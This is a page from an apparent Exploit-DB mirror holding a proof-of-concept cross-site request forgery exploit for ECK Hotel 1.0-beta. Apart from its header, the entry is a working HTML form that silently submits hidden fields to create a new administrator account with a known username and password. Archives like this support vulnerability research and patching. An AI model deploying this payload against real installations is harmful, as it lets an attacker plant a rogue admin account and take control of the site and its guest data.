bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/48258.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

27 lines
No EOL
1,004 B
Text
Raw Blame History

# Exploit Title : ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin)
# Product : ECK Hotel
# Version : 1.0-beta
# Date: 2020-03-26
# Software Download: https://sourceforge.net/projects/eckhotel/files/eck-hotel-v1.0-beta.zip/download
# Exploit Author: Mustafa Emre Gül
# Website: https://emregul.com.tr/
# Tested On : Win10 x64
# Description : Simple Hotel Management System.
PoC:
<!--Unauthenticated Create Admin User -->
<html>
<body>
<form action="localhost/index.php?module=user/user-add" method="POST">
<input type="hidden" name="nama" value="meg" />
<input type="hidden" name="id_user_role" value="1" />
<input type="hidden" name="jabatan" value="meg" />
<input type="hidden" name="nomor_telp" value="1" />
<input type="hidden" name="username" value="meg" />
<input type="hidden" name="password" value="meg" />
<input type="hidden" name="user-add" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Reference in a new issue View git blame Copy permalink